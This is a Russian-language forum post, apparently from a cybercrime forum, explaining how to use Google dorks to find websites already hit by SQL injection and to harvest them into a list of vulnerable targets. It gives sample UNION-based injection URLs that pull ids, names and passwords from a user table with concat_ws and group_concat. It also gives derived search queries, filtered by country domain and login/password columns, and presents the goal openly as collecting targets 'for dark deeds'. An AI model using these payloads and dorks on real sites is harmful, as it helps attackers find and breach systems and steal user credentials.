• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

Собираем базу SQLi или спасибо поисковикам

2FED

8айтовый
WebVoice
291815.png

Всем известно, что поисковые машины индексируют любую информацию, которая не закрыта в robots.txt. Этим давно начали пользоваться взломщики для поиска уязвимых систем. Многие используют так называемые дорки для нахождения определенных дыр.

После недавних событий с индексацией гуглом и яндексом пользовательских данных абонентов мтс и мегафон мне в голову пришла идея, а не попробывать ли искать с помощью дорка уже "сломанные" сайты. Мне это нужно было для своих целей, о которых я сейчас говорить не буду =).
Для поиска потенциально уязвимых сайтов(для sql иньекций) в основном используется дорк вида:
Код:
inurl:*.php?id=
При взломе в основном используются конструкции типа:
Код:
http://site.ru/*.php?id=-1+1,2,concat_ws(0x3a,id,name,pass),4+from+user
или
Код:
http://site.ru/*.php?id=-1+1,2,group_concat(0x3a,id,name,pass),4+from+user
Исходя из этого, можно выделить одну общую особенность, для всех проиндексированных страниц, общим будет:
Код:
concat_ws(0x3a,
или
Код:
group_concat(0x3a
из чего выплывает новый дорк:
Код:
inurl:concat_ws(0x3a,
или
Код:
inurl:group_concat(0x3a,
Благодаря возможности искать по определенной доменной зоне, можно изменить свой запрос в соответствиями с требованиями:
Код:
site:.us inurl:concat_ws(0x3a,
или
Код:
site:.de inurl:group_concat(0x3a,

Пример запроса
Код:
site:.de inurl:group_concat(0x3a,
264163.png


Также в запрос можно добавить наименования столбцов, интересующих нас(кто в теме, меня понял =) ) :
Код:
inurl:concat_ws(0x3a,_login,_pass

Плюс, если воспользоваться парсером гугла, можно собрать готовую базу уязвимых сайтов для своих темных дел =)

Специально для webcriminal.ru (с) 2FED
 
Последнее редактирование:
Сверху